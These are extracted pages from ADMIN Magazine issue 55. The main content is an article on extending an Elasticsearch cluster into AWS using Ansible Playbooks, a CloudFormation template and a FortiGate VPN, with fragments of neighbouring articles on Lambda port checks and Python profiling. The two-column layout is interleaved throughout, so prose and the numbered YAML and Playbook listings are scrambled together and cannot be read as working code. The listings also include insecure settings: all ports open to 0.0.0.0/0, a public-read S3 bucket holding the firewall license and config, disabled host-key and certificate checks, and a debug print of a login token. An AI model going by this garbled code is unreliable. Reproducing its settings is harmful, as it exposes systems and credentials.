rity group to itself in a rule, if needed by your Lambda function. [2] Ping from Lambda function:
[https://forums.aws.amazon.com/thread.
7 Configure your Lambda function to use the correct VPC, subnet(s), and security group.
jspa?threadID=263968]
8 Add the suitable IAM permissions to your Lambda functions so that it can access the
[3] AWS Management Console:
resources of your VPC. Make sure these permissions are available to your IAM role:
[https://console.aws.amazon.com]
ec2:CreateNetworkInterface
[4] handler.py: [https://github.com/
ec2:DescribeNetworkInterfaces
base2Services/aws-lambda-port-check/
ec2:DeleteNetworkInterface
blob/master/handler.py]
ec2:DescribeSecurityGroups
[5] Example test: [https://github.com/
ec2:DescribeSubnets
base2Services/aws-lambda-port-check/
ec2:DescribeVpc
blob/master/test/example.json]

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 69
M A N AG E M E N T Ansible Hybrid Cloud

Hybrid public/private cloud

Seamless
Extending your data center temporarily into the cloud during a customer rush might not be easy, but it
can be done, thanks to Ansible’s Playbooks and some AWS scripts. By Konstantin Agouros

Companies often do not exclusively necessarily retire them. With a few is, Secure Shell (SSH) for Linux VMs
use public cloud services such as Am- commands or clicks, you can simply and the Remote Desktop Protocol
azon Web Services (AWS) [1], Micro- assign more and faster resources. (RDP) for Windows VMs. By way of
soft Azure [2], or Google Cloud [3]. Things are different in the cloud, an example, when an AWS admin
Instead, they rely on a mix, known as where you have a service in mind. picks a database from the Database-
a hybrid cloud. In this scenario, you To operate it, you have to provide as-a-Service offerings, they can only
connect your data centers (private defined resources for a certain pe- access it through the IP address they
cloud) with the resources of a public riod of time, build these services in use to control the AWS Console.
cloud provider. The term “private an automated process, to the extent If you set up the virtual networks
cloud” is somewhat misleading, in possible (sometimes even from in the public cloud with private ad-
that the operation of many data cen- scratch), use them, and only pay dresses only, they are just as invisible
ters has little to do with cloud-based the public cloud providers for the from the Internet as the servers in
working methods, but it looks like the period of use. Then, you shut down your own data center.
name is here to stay. the machines, reducing resource re-
The advantage of a hybrid cloud is quirements to zero. Cloudbnb
that companies can use it to absorb If these resources include virtual ma-
peak loads or special requirements chines (VMs), you again build them At AWS, but also in the Google and
without having to procure new hard- automatically, use them, and delete Microsoft clouds, for example, the
ware for five- or six-digit figures. them. The classic server life cycle is concept of the virtual private cloud
In this article, I show how you can therefore irrelevant and is degraded to (VPC) acts as the account’s backbone.
add a cloud extension to an Ansible a component in an architecture that With an AWS account in each region,
[4] role that addresses local servers. an admin brings to life at the push of you can even operate several VPC in-
To do this, you extend a local Play- a button. stances side by side.
book for an Elasticsearch cluster so To connect to this network, the cloud
that it can also be used in the cloud, Visible for Everyone? providers offer a site-to-site VPN
and the resources disappear again service. Alternatively, you can set up
after use. One popular misconception about your own VPN gateway (e.g., in the
the use of public cloud services is form of a VM, such as Linux with
Cloudy Servers that these services are “freely ac- IPsec/OpenVPN) or a virtual firewall
cessible on the Internet.” This state- appliance, the latter of which offers
In classical data center operation, a ment is not entirely true, because a higher level of security, but usually
server is typically used for a project most cloud providers leave it to the comes at a price.
and installed by an admin. It then admin to decide whether to provide This service ultimately creates a
runs through a life cycle in which a service or a VM with a publicly ac- structure, that, conceptually, does not
Photo by JJ Ying on Unsplash

it receives regular patches. At some cessible IP address. Additionally, you differ fundamentally from the way
point, it is no longer needed or is out- usually have to activate explicitly all in which you would connect branch
dated. In the virtualized world, the the services you want to be acces- offices to the head office – with one
same thing happens in principle, only sible from outside, although this usu- difference: The public cloud provider
with virtual servers. However, for ally does not apply to the services can potentially access the data on the
performance reasons, you no longer required for administration -- that machines and in the containers.

70 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Ansible Hybrid Cloud M A N AG E M E N T

Protecting Data started there must become part of two servers on which data nodes 3
the Elastic cluster. and 4 are to run. In between is a vir-
The second major security concern The following explanations assume tual firewall, by Fortinet in this case,
relates to storing data. Especially you have already written Ansible that terminates the VPN tunnel and
when processing personal informa- roles for installing the Elasticsearch- controls access with firewall rules.
tion for members of the European Logstash-Kibana (ELK) cluster. You This setup requires several configura-
Union (EU), you have to be careful will find a listing for a Playbook on tion steps in AWS: You need to create
for legal reasons about which of the the ADMIN FTP site [7]. Thanks to the VPC with a main network. On
cloud provider’s regions is used to the structure of these roles, you can this, you then assign all the subnets:
store the data. Relocating the cus- add more nodes by appending param- one internal (inside) and one accessi-
tomer database to Japan might turn eters to the Hosts file, and it includes ble from the Internet (outside). Then,
out to be a less than brilliant idea. installing the software on the node. you create an Internet gateway in the
Even if the data is stored on servers The roles that Ansible calls are de- outside subnet. Through this, the data
within the EU, the question of who termined by the Hosts file (usually traffic migrating toward the Internet
gets access still needs to be clarified. in /etc/ansible/hosts) and the vari- finds an exit from the cloud. For this
Encrypting data in AWS is possi- ables set in it for each host. Listing 1 purpose, you define a routing table
ble [5]. If you do not have confidence shows the original file. for the outside subnet that specifies
in your abilities, you could equip a Host 10.0.2.25 is the master node this Internet gateway as the standard
Linux VM with a self-encrypted vol- on which all software runs. The route (Figure 2).
ume (e.g., LUKS [6]) and not store other two hosts are the data nodes
the password on the server. With of the cluster. The variable do_ela Cloud Firewall
AWS, this does not work for system controls whether the Elasticsearch
disks, but it does at least for data role can perform installations. When In the next step, you create a security
volumes. After starting the VM, you expanding the cluster, this ensures group that comprises host-related
have to send the password. This pro- that Ansible does not reconfigure the firewall rules for AWS. Because the
cess can be automated from your own existing nodes – but more about the firewall can protect itself, the group
data center. The only possible route details later. opens the firewall for all incoming and
of access for the provider is to read outgoing traffic, although this could
the machine RAM; this risk exists Extending the Cluster be restricted. The next step is to create
where modern hardware enables live an S3 bucket that contains the starting
encryption, as well.
in AWS configuration and the license for the
As a last resort, you can ensure that The virtual infrastructure in AWS firewall. Next, you generate the config
the computing resources in the cloud comprises a VPC with two subnets. file for the firewall and upload it with
only access data managed by the lo- One subnet can be reached from the the license. For a rented, but more ex-
cal data center. However, you will Internet; the other represents the in- pensive, firewall, this license informa-
need a powerful Internet connection. ternal area, which also contains the tion can also be omitted.

Solving a Problem
Assume you have a local Elastic-
search cluster of three nodes: a mas-
ter node, which also houses Logstash
and Kibana, and two data nodes with
data on board (Figure 1).
You now want to provide this cluster
temporarily two more data nodes
in the public cloud. You could have
several reasons for this; for ex-
ample, you might want to replace
the physical data nodes because of Figure 1: A secure network architecture (here the rough structure) should connect the
hardware problems, or you might nodes in the local data center with those on AWS.
temporarily need higher performance
for data analysis. Because it is not Listing 1: ELK Stack Hosts File
typically worthwhile to procure new 10.0.2.25 ansible_ssh_user=root logstash=1 kibana=1 masternode=1 grafana=1 do_ela=1
hardware on a temporary basis, the 10.0.2.26 ansible_ssh_user=root masternode=0 do_ela=1
public cloud is a solution. The logic 10.0.2.44 ansible_ssh_user=root masternode=0 do_ela=1
is shown in Figure 1; the machines

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 71
M A N AG E M E N T Ansible Hybrid Cloud

stack can also enter a return value,


which is typically the external IP ad-
dress of a generated object, so that
the user of the stack knows how to
use the cloud service.
Most VM images in AWS use cloud-
init technology (please see the
“cloud-init” box). Because CloudFor-
mation can also provide cloud-init
data to a VM, where do you draw the
line between Ansible and CloudFor-
Figure 2: A firewall separates an external subnet and an internal subnet (right). In detail, mation? Where it is practicable and
the AWS connection looks slightly different. reduces the total overhead.

Fixed and Variable


The fixed components of the target
infrastructure are the VMs (the fire-
wall and the two servers for Elastic),
the network structure, the routing
structure, and the logic of the secu-
rity groups. All of this information
should definitely be included in the
CloudFormation template.
The network’s IP addresses, the AWS
region, and the names of the objects
are variable and used as parameters in
Figure 3: The AWS firewall picks up its configuration from an S3 bucket. the stack definition; you have to spec-
ify them when calling the stack. The
Now set up network interfaces for stack on the two new AWS servers variables also include the name of the
the firewall in the two subnets. Also, (Figure 3). S3 bucket for the cloud-init configura-
create a role that later allows the fire- tion of the firewall and the public SSH
wall instance to access the S3 bucket. Cloud Shaping key stored with AWS, which is used to
Assign the network interfaces and enable access to the Linux VMs.
the role to the firewall instance to be In principle, Ansible would be able Finally, you need the internal IP ad-
created, and link the subnets to the to perform all these tasks, but that dresses of the Linux VMs, the exter-
firewall. Create a routing table for the would cause problems when cleaning nal public IP address of the firewall,
inside subnet and specify the firewall up the ensemble in the cloud, at the and the internal private IP address of
network card responsible for the in- latest. You would either have to save the firewall for further configuration.
side network as the target; then, gen- the information of the components Accordingly, these addresses pertain
erate a public IP address and assign it created there locally, or you would to the return values of the stack.
to the outside network interface. have to search the Playbook for the Ansible does all the work. It fills the
The next step is to set up a security components to be removed before the variables, generates the firewall con-
group for the servers. To do this, first Playbook cleans them up. figuration, which the AWS firewall
create two server instances on the A stack (similar to OpenStack) in
inside subnet and change the inside which you describe the complete cloud-init
firewall interface from a DHCP client infrastructure, which can be param- Cloud-init is a standard originally developed
to the static IP address that the AWS eterized in YAML or JSON format, is by Canonical and now used by all manu-
firewall has currently assigned to the easier. Then, you build the stack with facturers to start instances in the cloud
card. Now set up a VPN tunnel from a call (also using Ansible) and clear it on the basis of operating system images.
the local network into the AWS cloud. up with another call. The proprietary These instances set a self-defined locale, a
You need to define the rules and AWS technology for this is known as host name, SSH keys, and temporary mount
routes on the firewall on the local net- CloudFormation.
points, but also user data. Cloud-init collabo-
work. At the end of this configuration CloudFormation lets the stack receive
rates with your configuration management
marathon, and assuming that all the a construction parameter: in this
solution of choice, whether Chef, Puppet,
new cloud servers can be reached, fi- example, the IP addresses of the net-
Ansible, or Salt.
nally install and configure the Elastic works in the VPC. The author of the

72 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Ansible Hybrid Cloud M A N AG E M E N T

receives via cloud-init, and installs Listing 2: YAML Stack Definition Part 1
the software on the Linux VMs.
01 [...] 47 ToPort: 65535
Cloud-init could also install the soft- 02 Resources: 48 CidrIp: 0.0.0.0/0
ware, but Ansible will set up exactly 03 FortiVPC:
49 VpcId:
the roles that helped to configure 04 Type: AWS::EC2::VPC
05 Properties: 50 Ref: FortiVPC
the local servers at the beginning.
06 CidrBlock: 51
I developed the CloudFormation
07 Ref: VPCNet 52 InstanceProfile:
template from the version by fire-
08 Tags:
wall manufacturer Fortinet [8]. I 53 Properties:
09 - Key: Name
simplified the structure, compared 10 Value: 54 Path: /
with their version on GitHub, so 11 Ref: VPCName 55 Roles:
that the template in the cloud only 12 56 - Ref: InstanceRole
13 FortiVPCFrontNet:
raises a firewall and not a cluster. 57 Type: AWS::IAM::InstanceProfile
14 Type: AWS::EC2::Subnet
Additionally, the authors of the 15 Properties: 58 InstanceRole:
Fortinet template used a Lambda 16 CidrBlock: 59 Properties:
function to modify the firewall con- 17 Ref: VPCSubnetFront 60 AssumeRolePolicyDocument:
figuration. Here, this task is done 18 MapPublicIpOnLaunch: true
61 Statement:
by the Playbook, which in turn uses 19 VpcId:
20 Ref: FortiVPC 62 - Action:
the template.
21 63 - sts:AssumeRole
In the CloudFormation template, the 22 FortiVPCBackNet: 64 Effect: Allow
process can be static. The two Linux 23 Type: AWS::EC2::Subnet
65 Principal:
VMs use CentOS as their operating 24 Properties:
66 Service:
system and should run on the internal 25 CidrBlock:
26 Ref: VPCSubnetBack 67 - ec2.amazonaws.com
subnet; you simply attach them to the
27 MapPublicIpOnLaunch: false 68 Version: 2012-10-17
template and the return values. List-
28 AvailabilityZone: !GetAtt 69 Path: /
ings 2 through 4 show excerpts from FortiVPCFrontNet.AvailabilityZone
the stack definition in YAML format. 70 Policies:
29 VpcId:
The complete YAML file can be down- 30 Ref: FortiVPC 71 - PolicyDocument:
loaded from the ADMIN anonymous 31 72 Statement:
FTP site [7]. 32 FortiSecGroup: 73 - Action:
33 Type: AWS::EC2::SecurityGroup
The objects of the AWS::EC2::Instance 74 - ec2:Describe*
34 Properties:
type are the VMs designed to extend 35 GroupDescription: Group for FG 75 - ec2:AssociateAddress
the Elastic stack (Listings 3 and 4). 36 GroupName: fg 76 - ec2:AssignPrivateIpAddresses
Because of the firewall, the VM is 37 SecurityGroupEgress: 77 - ec2:UnassignPrivateIpAddresses
more complex to configure; it has to 38 - IpProtocol: -1
78 - ec2:ReplaceRoute
39 CidrIp: 0.0.0.0/0
have two dedicated interface objects 79 - s3:GetObject
40 SecurityGroupIngress:
so that routing can point to it (List- 41 - IpProtocol: tcp 80 Effect: Allow
ing 3, line 11). 42 FromPort: 0 81 Resource: '*'
Importantly, the firewall instance and 43 ToPort: 65535
82 Version: 2012-10-17
both generated interfaces are located in 44 CidrIp: 0.0.0.0/0
45 - IpProtocol: udp 83 PolicyName: ApplicationPolicy
the same availability zone; otherwise,
46 FromPort: 0 84 Type: AWS::IAM::Role
the stack will fail. To this end, the VMs
contain descriptions, and the second
subnet contains the reference to the command, which specifies the name described and uploads it together with
availability zone of the first subnet. of the YAML file created and fills the license.
The UserData part of the firewall in- the parameters at the beginning of The next task creates the complete
stance (Listing 3, line 18) contains a the stack. The S3 bucket you want stack (Listing 6). What’s new is the
description file that tells the VM where to pass in must already exist. Both connection to the old Elasticsearch
to find the configuration and license the license and the generated con- Playbook or Hosts file. The latter has
file previously uploaded by Ansible. figuration should be uploaded up a group named elahosts, which adds
The network configuration has al- front. All these tasks are done by the IP addresses of the two new serv-
ready been described and is defined the Ansible Playbook, as shown in ers to the Playbook so that a total of
at the top of Listing 2. The finished Listings 5 through 9. five hosts are in the list for further
template can now be run at the com- The Playbook uses multiple “plays.” execution of the Playbook. However,
mand line with the The first (Listing 5) creates the con- some operations will only take place
figuration for the firewall and, if not on the new hosts. Listing 6 (lines 44
aws cloudformation create-stack available, the S3 bucket (line 20) as and 49) creates the newhosts group,

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 73
M A N AG E M E N T Ansible Hybrid Cloud

Listing 3: YAML Stack Definition Part 2


01 FortiInstance: 33 - Ref: S3Region 67
02 Type: "AWS::EC2::Instance" 34 - '"' 68 DefRoutePub:
03 Properties: 35 - ",\n"
69 DependsOn: AttachGateway
04 IamInstanceProfile: 36 - '"license"'
05 Ref: InstanceProfile 37 - ' : ' 70 Properties:
06 ImageId: "ami-06f4dce9c3ae2c504" # 38 - '"' 71 DestinationCidrBlock: 0.0.0.0/0
for eu-west-3 paris 39 - / 72 GatewayId:
07 InstanceType: t2.small 40 - Ref: LicenseFileName 73 Ref: InternetGateway
08 AvailabilityZone: !GetAtt 41 - '"'
74 RouteTableId:
FortiVPCFrontNet.AvailabilityZone 42 - ",\n"
09 KeyName: 43 - '"config"' 75 Ref: RouteTablePub
10 Ref: KeyName 44 - ' : ' 76 Type: AWS::EC2::Route
11 NetworkInterfaces: 45 - '"' 77
12 - DeviceIndex: 0 46 - /fg.txt
78 RouteTablePriv:
13 NetworkInterfaceId: 47 - '"'
14 Ref: fgteni1 48 - "\n" 79 [...]
15 - DeviceIndex: 1 49 - '}' 80
16 NetworkInterfaceId: 50 81 DefRoutePriv:
17 Ref: fgteni2 51 InternetGateway: 82 [...]
18 UserData: 52 Type: AWS::EC2::InternetGateway
83
19 Fn::Base64: 53
20 Fn::Join: 54 AttachGateway: 84 SubnetRouteTableAssociationPub:
21 - '' 55 Properties: 85 Properties:
22 - 56 InternetGatewayId: 86 RouteTableId:
23 - "{\n" 57 Ref: InternetGateway
87 Ref: RouteTablePub
24 - '"bucket"' 58 VpcId:
25 - ' : "' 59 Ref: FortiVPC 88 SubnetId:
26 - Ref: S3Bucketname 60 Type: AWS::EC2::VPCGatewayAttachment 89 Ref: FortiVPCFrontNet
27 - '"' 61 90 Type:
28 - ",\n" 62 RouteTablePub: AWS::EC2::SubnetRouteTableAssociation
29 - '"region"' 63 Type: AWS::EC2::RouteTable
91
30 64 Properties:
31 - ' : ' 65 VpcId: 92 SubnetRouteTableAssociationPriv:
32 - '"' 66 Ref: FortiVPC 93 [...]

Listing 4: YAML Stack Definition Part 3 now known, the Play- after installation. At the end, the
01 [...] book can define the IP Ansible script in Listing 7 waits for
02 ServerInstance: address. the reboot to occur and then for it
03 Type: "AWS::EC2::Instance"
When logging in to to reach the firewall again.
04 Properties:
the firewall for the A play now follows that teaches the
05 ImageId: "ami-0e1ab783dc9489f34" # Centos7 for paris
06 InstanceType: t3.2xlarge first time, the firewall local firewall what the VPN tunnel
07 AvailabilityZone: !GetAtt FortiVPCFrontNet.AvailabilityZone requires a password to the firewall looks like in AWS
08 KeyName: change. You can use (Listing 8). The VPN definition at
09 Ref: KeyName several methods to the other end was in the previously
10 SubnetId: set up Fortigate in uploaded configuration. Because of
11 Ref: FortiVPCBackNet
Ansible. However, the the described problems with the An-
12 SecurityGroupIds:
13 - !Ref ServerSecGroup
FortiOS network mod- sible modules for FortiOS (I suspect
14 ules that have been incompatibilities between Ansible
15 Server2Instance: included in the An- modules and the Python fosapi),
16 Type: "AWS::EC2::Instance" sible distribution for a the play uses Ansible’s URI method
17 Properties: while do not yet work to configure the firewall. Authenti-
18 ImageId: "ami-0e1ab783dc9489f34" # Centos7 for paris properly. The raw ap- cation for the API requires a login
19 [...]
proach is used here process; it then returns a token that
(Listing 7, line 10), is used in the following REST calls.
to which it adds the two hosts. which pushes the commands onto The configuration initially consists of
The next play (Listing 7) configures the device, as on the command line. the key exchange phase1 and phase2
the firewall. In its existing configu- The first two lines of the raw task parameters. The phase1 parameter
ration, the static IP address for the set the password, which resides on contains the password, crypto pa-
inside network card is missing – the instance ID in the AWS version. rameters, and IP address of the fire-
AWS only sets this when creating Because the license has already wall in AWS. The phase2 parameter
the instance. Because the data is been installed, the firewall reboots also provides crypto parameters

74 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Ansible Hybrid Cloud M A N AG E M E N T

Listing 5: Ansible Playbook Part 1


01 --- 17 fgtpw: Firewall-Passwort 34 src: "{{ licensefile }}"
02 - name: Create VDC in AWS with fortigate as 18 35 mode: put
front 19 tasks: 36
03 hosts: localhost 20 - name: Create S3 Bucket for data 37 - name: Generate Config
04 connection: local 21 aws_s3: 38 template:
05 gather_facts: no 22 bucket: "{{ s3name }}" 39 src: awsforti-template.conf.j2
06 vars: 23 region: "{{ region }}" 40 dest: fg.txt
07 region: eu-west-3 24 mode: create 41
08 licensefile: license.lic 25 permission: public-read 42 - name: Upload Config
09 wholenet: 10.100.0.0/16 26 register: s3bucket 43 aws_s3:
10 frontnet: 10.100.254.0/28 27 44 bucket: "{{ s3name }}"
11 netmaskback: 17 28 - name: Upload License 45 region: "{{ region }}"
12 backnet: "10.100.0.0/{{ netmaskback }}" 29 aws_s3: 46 overwrite: different
13 lnet: 10.0.2.0/24 30 bucket: "{{ s3name }}" 47 object: "/fg.txt"
14 rnet: "{{ backnet }}" 31 region: "{{ region }}" 48 src: "fg.txt"
15 s3name: stackdata 32 overwrite: different 49 mode: put
16 keyname: mgtkey 33 object: "/{{ licensefile }}" 50 [...]

Listing 6: Ansible Playbook Part 2


01 [...] 22 - name: Print Results outputs.Server2Address }}"
02 - name: Create Stack 23 [...] 42
03 cloudformation: 24 43 - name: Add NewGroup1
04 stack_name: VPCFG 25 - name: Wait for VM to be up 44 add_host:
05 state: present 26 [...] 45 groupname: newhosts
06 region: "{{ region }}" 27 46 hostname: "{{ stackinfo.stack_
07 template: fortistack.yml 28 - name: New Group outputs.Server1Address }}"
08 template_parameters: 29 add_host: 47
09 InstanceType: c5.large 30 groupname: fg 48 - name: Add NewGroup2
10 FGUserName: admin 31 hostname: "{{ stackinfo.stack_ 49 add_host:
11 KeyName: "{{ keyname }}" outputs.FortiGatepubIp }}" 50 groupname: newhosts
12 VPCName: VDCVPC 32 51 hostname: "{{ stackinfo.stack_
13 VPCNet: "{{ wholenet }}" 33 - name: Add ElaGroup1 outputs.Server2Address }}"
14 Kubnet: "{{ lnet }}" 34 add_host: 52
15 VPCSubnetFront: "{{ frontnet }}" 35 groupname: elahosts 53 - name: Set Fact
16 VPCSubnetBack: "{{ backnet }}" 36 hostname: "{{ stackinfo.stack_ 54 set_fact:
17 S3Bucketname: "{{ s3name }}" outputs.Server1Address }}" 55 netmaskback: "{{ netmaskback }}"
18 LicenseFileName: 37 56
"{{ licensefile }}" 38 - name: Add ElaGroup2 57 - name: Set Fact
19 S3Region: "{{ region }}" 39 add_host: 58 set_fact:
20 register: stackinfo 40 groupname: elahosts 59 fgtpw: "{{ fgtpw }}"
21 41 hostname: "{{ stackinfo.stack_ 60 [...]

and data for the local and remote takes some time for the VPN con- Within AWS, all systems are pre-
networks. The configuration also nection to be ready for use, the play pared for IPv6, but this does not ap-
provides a route (line 62) that passes now waits for the master node of ply to the configuration used here.
the network on the AWS side to the the Elastic cluster until it can reach Therefore, the first task forces you to
VPN tunnel, and two firewall rules a new node via SSH. switch to IPv4. The second one up-
that allow traffic from and to the pri- The last piece of the Playbook fi- dates the configuration of the system.
vate network on the AWS side (lines nally installs Elasticsearch on the In the third task, the Elastic cluster
71 and 85). new node and adapts its configura- role finally installs and configures the
A bit further down (Listing 9), the tion to match the existing cluster. software.
Playbook sets the do_ela parameter The role takes the major version of Because Ansible only creates the
to 1 for the new hosts so that this Elasticsearch as a parameter and Elasticsearch user to which the elk-
role will also install Elasticsearch a path in which the Elasticsearch data/ folder should belong during
later. It uses 0 as the value for server can store the data, which al- the installation, the script also has
masternode, because the new hosts lows you to insert a separate mount to tweak the permissions and restart
are data nodes. Because it usually point on a data-only disk. Elasticsearch (starting in line 46).

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 75
M A N AG E M E N T Ansible Hybrid Cloud

Listing 7: Ansible Playbook Part 3


01 [...] FGIntAddress }}/17"
02 - name: ChangePW 18 next
03 hosts: fg
19 end
04 vars:
05 ansible_user: admin 20 tags: pw
06 ansible_ssh_common_args: -o StrictHostKeyChecking=no 21 - name: Wait for License Reboot
07 ansible_ssh_pass: "{{ hostvars['localhost'].stackinfo.stack_ 22 pause:
outputs.FortiGateId }}" 23 minutes: 1
08 gather_facts: no
24
09
10 tasks: 25 - name: Wait for VM to be up
11 - raw: | 26 wait_for:
12 "{{ hostvars['localhost'].fgtpw }}" 27 host: "{{ inventory_hostname }}"
13 "{{ hostvars['localhost'].fgtpw }}" 28 port: 22
14 config system interface
29 state: started
15 edit port2
16 set mode static 30 delegate_to: localhost
17 set ip "{{ hostvars['localhost'].stackinfo.stack_outputs. 31 [...]

Listing 8: Ansible Playbook Part 4


01 [...] 51 url:
02 - name: Local Firewall Config https://{{ localfw }}/api/v2/cmdb/vpn.ipsec/phase2-interface
03 hosts: localhost 52 validate_certs: no
04 connection: local
53 method: POST
05 gather_facts: no
54 headers:
06 vars:
55 X-CSRFTOKEN: "{{ token }}"
07 localfw: 10.0.2.90
56 Cookie: "{{ uriresult.set_cookie }}"
08 localadmin: admin
57 body: "{{ lookup('template', 'forti-phase2.j2') }}"
09 localpw: ""
10 vdom: root 58 body_format: json
11 lnet: 10.0.2.0/24 59 register: answer
12 rnet: 10.100.0.0/17 60 tags: phase2
13 remotefw: "{{ stackinfo.stack_outputs.FortiGatepubIp }}" 61
14 localinterface: port1 62 - name: Route old style
15 psk: "<Password>" 63 [...]
16 vpnname: elavpn 64
17 65 - name: Local Object Old Style
18 tasks: 66 [...]
19 67
20 - name: Get the token with uri 68 - name: Remote Object Old Stlye
21 uri: 69 [...]
22 url: https://{{ localfw }}/logincheck 70
23 method: POST 71 - name: FW-Rule-In old style
24 validate_certs: no 72 uri:
25 body: "ajax=1&username={{ localadmin }}&password={{ localpw }}" 73 url: https://{{ localfw }}/api/v2/cmdb/firewall/policy
26 register: uriresult 74 validate_certs: no
27 tags: gettoken 75 method: POST
28 76 headers:
29 - name: Get Token out 77 Cookie: "{{ uriresult.set_cookie }}"
30 set_fact: 78 X-CSRFTOKEN: "{{ token }}"
31 token: "{{ 79 body:
32 uriresult.cookies['ccsrftoken'] | regex_replace('\"', '') }}" 80 [...]
33 81 body_format: json
34 - debug: msg="{{ token }}"
82 register: answer
35
83 tags: rulein
36 - name: Phase1 old Style
84
37 uri:
85 - name: FW-Rule-out old style
38 url:
https://{{ localfw }}/api/v2/cmdb/vpn.ipsec/phase1-interface 86 uri:
39 validate_certs: no 87 url: https://{{ localfw }}/api/v2/cmdb/firewall/policy
40 method: POST 88 validate_certs: no
41 headers: 89 method: POST
42 X-CSRFTOKEN: "{{ token }}" 90 headers:
43 Cookie: "{{ uriresult.set_cookie }}" 91 Cookie: "{{ uriresult.set_cookie }}"
44 body: "{{ lookup('template', 'forti-phase1.j2') }}" 92 X-CSRFTOKEN: "{{ token }}"
45 body_format: json 93 body:
46 register: answer 94 [...]
47 tags: phase1 95 body_format: json
48 96 register: answer
49 - name: Phase2 old style 97 tags: ruleout
50 uri: 98 [...]

76 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Ansible Hybrid Cloud M A N AG E M E N T

This completes the cloud expan- Listing 9: Ansible Playbook Part 5


sion. If everything worked out, the 01 [...] 32 name: "*"
Kibana console will be presented 02 - name: Set Facts for new hosts 33 state: "latest"
with the view from Figure 4 after a 03 hosts: newhosts 34 name: RHUpdates
few moments. 04 [...] 35 become: yes
05 masternode: 0 36 become_method: sudo
06 do_ela: 1 37 when: do_ela == 1
Big Cleanup 07 38
08 - name: Wait For VPN Tunnel 39 - include_role:
If you want to remove the exten- 09 hosts: 10.0.2.25 40 name: matrix.centos-elasticcluster
sion, you have to remove the nodes 10 [...] 41 vars:
from the cluster with an API call: 11 42 clustername: matrixlog
12 - name: Install elastic 43 elaversion: 6
13 hosts: elahosts
curl U 44 when: do_ela == 1
14 vars:
-X PUT 10.0.2.25:9200/_cluster/settings U 45
15 elaversion: 6
46 - name: Set Permissions for data
-H 'Content-Type: application/json' U 16 eladatapath: /elkdata
47 file:
-d '{U 17 ansible_ssh_common_args: -o
48 path: "{{ eladatapath }}"
"transient" : U StrictHostKeyChecking=no
49 owner: elasticsearch
18
{"cluster.routing.allocation.U 50 group: elasticsearch
19 tasks:
exclude._ip":"10.100.68.139" } }' 51 state: directory
20
21 - ini_file: 52 mode: "4750"
This command blocks further assign- 22 path: /etc/yum.conf 53 become: yes
23 section: main 54 become_method: sudo
ments and causes the cluster to move
24 option: ip_resolve 55 when: do_ela == 1
all shards away from this node. After 56
25 value: 4
the action, no more shards are as- 26 become: yes 57 - systemd:
signed, and you can simply switch off 27 become_method: sudo 58 name: elasticsearch
the node. 28 when: do_ela == 1 59 state: restarted
29 name: Change yum.conf 60 become: yes
30 61 become_method: sudo
Conclusion 31 - yum: 62 when: do_ela == 1

The hybrid cloud thrives, because


admins can transfer scripts and use them, you would have to take Info
Playbooks seamlessly from their into account configuring the pe- [1] AWS: [https://aws.amazon.com/]
environment to the cloud world. culiarities of the respective cloud [2] Azure: [https://azure.microsoft.com]
Although higher quality cloud provider. With VMs in Microsoft [3] Google Cloud: [https://cloud.google.com]
services exist than those covered Azure, however, the example shown [4] Ansible: [https://www.ansible.com]
in this article (AWS also has Elas- here would work directly, so the [5] “Data security in the AWS Cloud” by Kon-
ticsearch as a Service), these ser- user would only have to replace the stantin Agouros, Linux Magazine, issue
vices typically have only limited CloudFormation part with an Azure 229, December 2019, pg. 34,
suitability for direct docking. To template. Q [http://www.linux-magazine.com/Issues/
2019/229/Data-Security-in-AWS]
[6] LUKS: [https://gitlab.com/cryptsetup]
[7] Listings for this article:
[ftp://ftp.linux-magazine.com/pub/listings/
admin-magazine.com/55/]
[8] Fortinet’s script template:
[https://github.com/fortinet/
aws-cloudformation-templates/tree/
master/HA/6.0]

The Author
Konstantin Agouros is Head of Open Source Proj-
ects at matrix technology AG, where he and his
team advise customers on open source and cloud
topics. His latest book Software Defined Network-
ing: SDN-Praxis mit Controllern und OpenFlow
[Practical Applications with Controllers and Open-
Figure 4: The status of the Elastic cluster after expansion into the AWS Cloud. Flow] (in German) is published by de Gruyter.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 77
N U TS A N D B O LTS Python Code Analysis

Profiling Python code

In Profile
Profiling your Python code – as a whole or by function – shows where you ues to capture the profile accurately.
If the interval becomes too small,
should spend time speeding up your programs. By Jeff Layton however, it almost becomes deter-
ministic profiling, and run time is
To improve the performance of your I focus on two types: deterministic greatly increased.
applications, you need to conduct and statistical. Deterministic profil- If your code takes a long time to
some kind of dynamic (program, soft- ing captures every computation of execute (e.g., hours or days), deter-
ware, code) analysis, also called pro- the code and produces very accurate ministic profiling might be impossible
filing, to measure metrics of interest. profiles, but it can greatly slow down because the increase in run time is
A key metric for developers is time code performance. Although you unacceptable. In this case, statistical
(i.e., where is the code spending most achieve very good accuracy with profiling is appropriate because of the
of its time?), because it allows you to the profile, run times are greatly longer periods of time available to
focus on areas, or hotspots, that can increased, and you have to wonder sample performance.
be made to run faster. whether the profiling didn’t ad- In this article, I focus on profiling
And, this might seem obvious, but versely affect how the code ran. For Python code, primarily because of
if you don’t profile for code optimi- example, did the profiling cause the a current lack of Python profiling
zation, you could flounder all over computation bottlenecks to move to but also because I think the process
the code improving sections you a different place in the code? of profiling Python code, creating
think might be bottlenecks. I have Statistical profiling, on the other functions, and using Numba to then
seen people spend hours working a hand, takes periodic “samples” of compile these functions for CPUs or
particular part of their code when a the code computations and uses GPUs is a good way to help improve
simple profile showed that portion them as representations of the profile performance.
of the code contributed very little to of the code. This method usually To help illustrate some tools you
the overall run time. I admit that I has very little effect on code perfor- can use to profile Python code, I
Lead Image ©-Yong Hian Lim, Fotolia.com

have also done this; however, once I mance, so you can get a profile that will use an example of an idealized
profiled the code, I found that I had is very close to the real execution molecular dynamics (MD) applica-
wasted my time and needed to focus of the code. You do have to wonder tion. I’ll work through some profil-
elsewhere. about the correct time interval to get ing tools and modify the code in a
Different kinds of profiling (e.g., an accurate profile of the applica- reasonable manner for better profil-
event-based, statistical, instru- tion while not affecting the run time. ing. The first, and probably most
mented, simulation), are used in Usually this means setting the time used and flexible, method I want to
different situations. In this article, intervals to smaller and smaller val- mention is “manual” profiling.

